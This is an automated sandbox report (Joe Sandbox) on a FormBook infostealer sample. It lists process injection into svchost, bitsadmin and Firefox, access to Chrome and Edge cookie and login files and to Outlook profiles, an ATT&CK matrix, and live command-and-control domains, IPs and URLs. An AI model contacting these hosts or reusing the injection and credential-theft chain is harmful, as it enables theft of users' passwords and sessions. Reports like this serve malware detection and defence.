Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread register set: target process: 1228

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 29E4008

Jump to behavior

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B68C93 LogonUserW,

0_2_00B68C93

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B13B4C

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00B14A35

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B74EF5 mouse_event,

0_2_00B74EF5

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WyGagXWAfb.exe"	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

0_2_00B681F7

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B74C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B74C03

Source: WyGagXWAfb.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: WyGagXWAfb.exe, bmHwSvjHTinzr.exe, 00000005.00000002.2925381562.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000000.2174147010.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2925381562.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000000.2174147010.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2925381562.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000000.2174147010.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2925381562.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000000.2174147010.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B3886B cpuid

0_2_00B3886B

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B450D7

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B52230 GetUserNameW,

0_2_00B52230

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B4418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00B4418A

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B14AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: WyGagXWAfb.exe	Binary or memory string: WIN_81
Source: WyGagXWAfb.exe	Binary or memory string: WIN_XP
Source: WyGagXWAfb.exe	Binary or memory string: WIN_XPe
Source: WyGagXWAfb.exe	Binary or memory string: WIN_VISTA
Source: WyGagXWAfb.exe	Binary or memory string: WIN_7
Source: WyGagXWAfb.exe	Binary or memory string: WIN_8
Source: WyGagXWAfb.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B86596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00B86596
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B86A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00B86A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WyGagXWAfb.exe	64%	Virustotal		Browse
WyGagXWAfb.exe	68%	ReversingLabs	Win32.Trojan.Leonem
WyGagXWAfb.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://server/get.asp	0%	Avira URL Cloud	safe
http://www.sweetspotfitness.net/lqx0/	0%	Avira URL Cloud	safe
http://www.bonsai-stbg.info/3cb8/?28=ytMd5JoNDlp2jn5Pf080ZLd4stN1vAS6iwQxmGOCcgQqtWeYidPwJokyLIn5bfhZSz6tk8SdxwqnTJTPUhj5Hm4EFHb2t6dUrPwKRW7fy+YL2chtEAutPD0=&D48D=_fRxbHzp	0%	Avira URL Cloud	safe
https://www.hover.com/renew?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/email?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/domain_pricing?source=parked	0%	Avira URL Cloud	safe
http://www.sweetspotfitness.net/lqx0/?28=ZcGFFFKPGpOKzuYlH0bTDaS6hCz3KyeMWvADo2w+EgPOJwiUlM35Knpfqh5LnbTmzp8Goxw1RSHUITR6WsGKOKvYVALk7yp6HMgY36QA1UuvockXGPvJZD8=&D48D=_fRxbHzp	0%	Avira URL Cloud	safe
http://www.virtusign.info/69j2/?28=dLOf+4bthJ/u4c08U69ej48CCJnyAN8IrfKExSjlwiubv1BfPs9ejhiJo6s9NxKGEEo4eBxOiQfre4OpkQEfwraiUJhkrXAG1cZ+G+Id5d1uI+fzBgJa19I=&D48D=_fRxbHzp	0%	Avira URL Cloud	safe
https://www.hover.com/transfer_in?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/privacy?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/about?source=parked	0%	Avira URL Cloud	safe
http://www.virtusign.info/69j2/	0%	Avira URL Cloud	safe
http://www.8066642.xyz	0%	Avira URL Cloud	safe
https://www.hover.com/tools?source=parked	0%	Avira URL Cloud	safe
https://help.hover.com/home?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/tos?source=parked	0%	Avira URL Cloud	safe
http://www.8066642.xyz/76t8/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
virtusign.info	3.33.130.190	true	true	unknown
www.8066642.xyz	103.249.106.91	true	true	unknown
www.sweetspotfitness.net	216.40.34.41	true	true	unknown
bonsai-stbg.info	81.169.145.72	true	true	unknown
www.sortsport.shop	unknown	unknown	false	unknown
www.virtusign.info	unknown	unknown	false	unknown
www.bonsai-stbg.info	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sweetspotfitness.net/lqx0/?28=ZcGFFFKPGpOKzuYlH0bTDaS6hCz3KyeMWvADo2w+EgPOJwiUlM35Knpfqh5LnbTmzp8Goxw1RSHUITR6WsGKOKvYVALk7yp6HMgY36QA1UuvockXGPvJZD8=&D48D=_fRxbHzp	true	Avira URL Cloud: safe	unknown
http://www.virtusign.info/69j2/?28=dLOf+4bthJ/u4c08U69ej48CCJnyAN8IrfKExSjlwiubv1BfPs9ejhiJo6s9NxKGEEo4eBxOiQfre4OpkQEfwraiUJhkrXAG1cZ+G+Id5d1uI+fzBgJa19I=&D48D=_fRxbHzp	true	Avira URL Cloud: safe	unknown
http://www.bonsai-stbg.info/3cb8/?28=ytMd5JoNDlp2jn5Pf080ZLd4stN1vAS6iwQxmGOCcgQqtWeYidPwJokyLIn5bfhZSz6tk8SdxwqnTJTPUhj5Hm4EFHb2t6dUrPwKRW7fy+YL2chtEAutPD0=&D48D=_fRxbHzp	true	Avira URL Cloud: safe	unknown
http://www.sweetspotfitness.net/lqx0/	true	Avira URL Cloud: safe	unknown
http://www.8066642.xyz/76t8/	true	Avira URL Cloud: safe	unknown
http://www.virtusign.info/69j2/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.hover.com/domain_pricing?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/privacy?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/hover	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.instagram.com/hover_domains	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false		high
http://server/get.asp	svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/transfer_in?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/renew?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/email?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/about?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/domains/results	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/tos?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.8066642.xyz	bmHwSvjHTinzr.exe, 00000005.00000002.2925122303.0000000000A17000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/tools?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.hover.com/home?source=parked	bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/?source=parked	bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
81.169.145.72	bonsai-stbg.info	Germany	6724	STRATOSTRATOAGDE	true
103.249.106.91	www.8066642.xyz	China	137443	ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK	true
3.33.130.190	virtusign.info	United States	8987	AMAZONEXPANSIONGB	true
216.40.34.41	www.sweetspotfitness.net	Canada	15348	TUCOWSCA	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587993
Start date and time:	2025-01-10 20:16:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WyGagXWAfb.exe renamed because original name is a hash value
Original Sample Name:	0c9998720cc90e23ce1bd5b4f7ed512316027625ccea7eca9722a32557a54adb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 47 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:18:50	API Interceptor	55795x Sleep call for process: bitsadmin.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
81.169.145.72	TTCopy-240323-PDF.exe	Get hash	malicious	FormBook	Browse	www.wellblech.shop/qsni/?ZOm=dXna0d&C6=xN2Ykcx+dVxWXpEVy0UIOF/PMPW6GcpN8TjIanJ5/1roRjTsXtyK1vSqyqsFx56l6NugQvTefoOMKvMnzU7TqfIAwz99vX70dq+IkxJCDx9y
	Requisito de pedido #23022300.exe	Get hash	malicious	FormBook	Browse	www.frogair.online/vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4
	Requisito ordine n. 230210.exe	Get hash	malicious	FormBook	Browse	www.frogair.online/vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF
	zeuhAxTIRX.exe	Get hash	malicious	FormBook	Browse	www.frogair.online/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw==
	file.exe	Get hash	malicious	FormBook	Browse	www.frogair.online/crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO
